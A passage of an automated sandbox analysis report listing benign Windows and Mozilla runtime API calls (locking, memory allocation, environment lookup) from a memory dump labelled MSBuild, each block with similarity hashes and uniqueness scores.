• InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CAED1C5), ref: 6CADD52E
• EnterCriticalSection.KERNEL32(6CB3E7DC), ref: 6CADD690
• LeaveCriticalSection.KERNEL32(6CB3E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CAED1C5), ref: 6CADD751
Strings
Memory Dump Source
• Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
• Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
• String ID: MOZ_CRASH()
• API String ID: 3805649505-2608361144
• Opcode ID: ac298c45f2f9e40f30c3390983fe0d910d0bf9bd3617443b61a592fc405742f3
• Instruction ID: b611f9505f8382e1384bcaa400fa30e75f8294a3477709d23f5475a735a5675f
• Opcode Fuzzy Hash: ac298c45f2f9e40f30c3390983fe0d910d0bf9bd3617443b61a592fc405742f3
• Instruction Fuzzy Hash: 6151F371A047518FD328CF28C19475ABBE1EB89704F15492EE99DC7B84D770E884CF91
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 6CAB4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CAF3EBD,6CAF3EBD,00000000), ref: 6CAB42A9
• tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CB0B127), ref: 6CB0B463
• _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CB0B4C9
• strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6CB0B4E4
Strings
Memory Dump Source
• Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
• Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
Similarity
• API ID: _getpidstrlenstrncmptolower
• String ID: pid:
• API String ID: 1720406129-3403741246
• Opcode ID: 2449db9c30e9180057c43bfb2043219340936a5b84a7ed4489530d632f0b3ae6
• Instruction ID: e6b4bf6e9569d16e1c20a47c8844b30dbd04cb3ef867c9d0876026a5d18cfc87
• Opcode Fuzzy Hash: 2449db9c30e9180057c43bfb2043219340936a5b84a7ed4489530d632f0b3ae6
• Instruction Fuzzy Hash: CD312631B01259CFDB10DFA9D880AEEBBB5FF05318F540529D81567A41D731EA89CBE2
Uniqueness

Uniqueness Score: -1.00%

APIs
• strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CB00CD5
  • Part of subcall function 6CAEF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CAEF9A7
• strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CB00D40
• free.MOZGLUE ref: 6CB00DCB
  • Part of subcall function 6CAD5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CAD5EDB
  • Part of subcall function 6CAD5E90: memset.VCRUNTIME140(6CB17765,000000E5,55CCCCCC), ref: 6CAD5F27
  • Part of subcall function 6CAD5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CAD5FB2
• free.MOZGLUE ref: 6CB00DDD
• free.MOZGLUE ref: 6CB00DF2
Memory Dump Source
• Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
• Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
Similarity
• API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
• String ID:
• API String ID: 4069420150-0
• Opcode ID: c8b3903fb09611389d2051f6927dc0b7562f7afdf1cec0bc49faab7927ea973a
• Instruction ID: dfa2605e1b16dd70cdebdbdba91ed252a97d4593eef92e1c655789eaacdf6533
• Opcode Fuzzy Hash: c8b3903fb09611389d2051f6927dc0b7562f7afdf1cec0bc49faab7927ea973a
• Instruction Fuzzy Hash: 7D41F775A087918BD320DF29D1407AAFBE5FFC9614F518A2EE8D887750DB70A484CB92
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6CAFDA31,00100000,?,?,00000000,?), ref: 6CB0CDA4
                                                                                                                                                                                                                                                                              • Part of subcall function 6CACCA10: malloc.MOZGLUE(?), ref: 6CACCA26
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB0D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6CB0CDBA,00100000,?,00000000,?,6CAFDA31,00100000,?,?,00000000,?), ref: 6CB0D158
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB0D130: InitializeConditionVariable.KERNEL32(00000098,?,6CB0CDBA,00100000,?,00000000,?,6CAFDA31,00100000,?,?,00000000,?), ref: 6CB0D177
                                                                                                                                                                                                                                                                            • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6CAFDA31,00100000,?,?,00000000,?), ref: 6CB0CDC4
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB07480: ReleaseSRWLockExclusive.KERNEL32(?,6CB115FC,?,?,?,?,6CB115FC,?), ref: 6CB074EB
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6CAFDA31,00100000,?,?,00000000,?), ref: 6CB0CECC
                                                                                                                                                                                                                                                                              • Part of subcall function 6CACCA10: mozalloc_abort.MOZGLUE(?), ref: 6CACCAA2
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAFCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6CB0CEEA,?,?,?,?,00000000,?,6CAFDA31,00100000,?,?,00000000), ref: 6CAFCB57
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAFCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6CAFCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6CB0CEEA,?,?), ref: 6CAFCBAF
                                                                                                                                                                                                                                                                            • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6CAFDA31,00100000,?,?,00000000,?), ref: 6CB0D058
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 861561044-0
                                                                                                                                                                                                                                                                            • Opcode ID: d243e1b8cd931a6e6b4b21a3ffcc558895928accf25e7507c67f46aefc1f5d83
                                                                                                                                                                                                                                                                            • Instruction ID: ccbe5c979a8fd527909a4444e042fe345088669babce96c1762a68b6d5d991c1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d243e1b8cd931a6e6b4b21a3ffcc558895928accf25e7507c67f46aefc1f5d83
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BBD18F71B04B469FD708CF28C580799FBE1FF88304F01866DD85987751EB31A9A9CB82
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetTickCount64.KERNEL32 ref: 6CAD5D40
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(6CB3F688), ref: 6CAD5D67
                                                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 6CAD5DB4
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(6CB3F688), ref: 6CAD5DED
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 557828605-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1813c0b2ceafbb7807b085a225cdd1e3750e98bfc24c216fbf3152f45eb528a2
                                                                                                                                                                                                                                                                            • Instruction ID: 58ae1bf59d07c8e21bd5061ba13f60fba03d100fb9b964236f0baa45c8168a05
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1813c0b2ceafbb7807b085a225cdd1e3750e98bfc24c216fbf3152f45eb528a2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D515EB1F001698FCF18CFA8C954BAEBBB1FB89304F1A8659D859A7754C7307985CB90
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6CABCEBD
                                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6CABCEF5
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6CABCF4E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memcpy$memset
                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                            • API String ID: 438689982-4108050209
                                                                                                                                                                                                                                                                            • Opcode ID: 47d26cfd650b1789e98dcc3fae22fc88c49003cffed1084e580774445de2849d
                                                                                                                                                                                                                                                                            • Instruction ID: fe0ccae8ee379a79648394a80ee2e393898b8e3a47221ffd78e8673028bacaab
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47d26cfd650b1789e98dcc3fae22fc88c49003cffed1084e580774445de2849d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E351F275A00256CFCB00CF18C490EAABBB9EF99304F198599E8595F351D735ED46CBE0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6CAF82BC,?,?), ref: 6CAF649B
                                                                                                                                                                                                                                                                              • Part of subcall function 6CACCA10: malloc.MOZGLUE(?), ref: 6CACCA26
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAF64A9
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEFA80: GetCurrentThreadId.KERNEL32 ref: 6CAEFA8D
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEFA80: AcquireSRWLockExclusive.KERNEL32(6CB3F448), ref: 6CAEFA99
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAF653F
                                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CAF655A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3596744550-0
                                                                                                                                                                                                                                                                            • Opcode ID: 9d3690c9f8fe528e780700715556a2773e40b39c8c5c2414f18b33013cc61e35
                                                                                                                                                                                                                                                                            • Instruction ID: 6624df5c2f5bd632885333fe15f0bb3a8f0ac7fc16161e4fdd18e77019b5f3c0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d3690c9f8fe528e780700715556a2773e40b39c8c5c2414f18b33013cc61e35
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81317EB5A043559FD700DF14D984A9EBBE4FF88318F00842EE85A97741DB30E909CB92
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CACB4F5
                                                                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CB3F4B8), ref: 6CACB502
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CB3F4B8), ref: 6CACB542
                                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CACB578
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
• Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2047719359-0
                                                                                                                                                                                                                                                                            • Opcode ID: ac2bc5264f12acb6866cbdc2837669b31747fa12d0eb0d689af2cb1f0199f6da
                                                                                                                                                                                                                                                                            • Instruction ID: df778cdc2e09eada43c57db8a2a4f27051bd201252d047069ff6574395c3636b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac2bc5264f12acb6866cbdc2837669b31747fa12d0eb0d689af2cb1f0199f6da
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6110630A04B45C7D3228F29D5007A6B3B0FF96319F14970AE84E53A02EBB2B5C58791
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6CABF20E,?), ref: 6CAF3DF5
                                                                                                                                                                                                                                                                            • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6CABF20E,00000000,?), ref: 6CAF3DFC
                                                                                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CAF3E06
                                                                                                                                                                                                                                                                            • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6CAF3E0E
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAECC00: GetCurrentProcess.KERNEL32(?,?,6CAB31A7), ref: 6CAECC0D
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAECC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6CAB31A7), ref: 6CAECC16
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
• Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2787204188-0
                                                                                                                                                                                                                                                                            • Opcode ID: 0956bb3c6d56f2177dea96f722e23f9cb064d644ae7233fe7ade2d8fb334fc18
                                                                                                                                                                                                                                                                            • Instruction ID: 0ce3d5426380d67658751951c18d889f448ca5caa8ff0c68668e059de2b75f1c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0956bb3c6d56f2177dea96f722e23f9cb064d644ae7233fe7ade2d8fb334fc18
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47F012B15002187BDB04AB54DC41DAF376DDF46628F040020FD1C57741D635BD5996F7
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6CB085D3
                                                                                                                                                                                                                                                                              • Part of subcall function 6CACCA10: malloc.MOZGLUE(?), ref: 6CACCA26
                                                                                                                                                                                                                                                                            • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6CB08725
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
• Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                                                                                                                                                                                                            • String ID: map/set<T> too long
                                                                                                                                                                                                                                                                            • API String ID: 3720097785-1285458680
                                                                                                                                                                                                                                                                            • Opcode ID: 8f4507e63071fe3ed2dd316b347ff4948ce6f3898f38a8be113fa5359d0678de
                                                                                                                                                                                                                                                                            • Instruction ID: 5afb694c281f1bb328cbfd167b7bb0e59dee32db10ae43469ec97f21eff85398
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f4507e63071fe3ed2dd316b347ff4948ce6f3898f38a8be113fa5359d0678de
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72516674A00681CFD701CF18C184A5ABBF1FF5A328F1AC18AD8595BB52C736E985CF92
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CAF3D19
                                                                                                                                                                                                                                                                            • mozalloc_abort.MOZGLUE(?), ref: 6CAF3D6C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
• Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _errnomozalloc_abort
                                                                                                                                                                                                                                                                            • String ID: d
                                                                                                                                                                                                                                                                            • API String ID: 3471241338-2564639436
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6CB16E22
                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CB16E3F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • MOZ_DISABLE_WALKTHESTACK, xrefs: 6CB16E1D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Init_thread_footergetenv
                                                                                                                                                                                                                                                                            • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                                                                                                                                                                                                            • API String ID: 1472356752-1153589363
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6CB0B2C9,?,?,?,6CB0B127,?,?,?,?,?,?,?,?,?,6CB0AE52), ref: 6CB0B628
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB090E0: free.MOZGLUE(?,00000000,?,?,6CB0DEDB), ref: 6CB090FF
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB090E0: free.MOZGLUE(?,00000000,?,?,6CB0DEDB), ref: 6CB09108
                                                                                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CB0B2C9,?,?,?,6CB0B127,?,?,?,?,?,?,?,?,?,6CB0AE52), ref: 6CB0B67D
                                                                                                                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CB0B2C9,?,?,?,6CB0B127,?,?,?,?,?,?,?,?,?,6CB0AE52), ref: 6CB0B708
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6CB0B127,?,?,?,?,?,?,?,?), ref: 6CB0B74D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: freemalloc
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3061335427-0
                                                                                                                                                                                                                                                                            Uniqueness

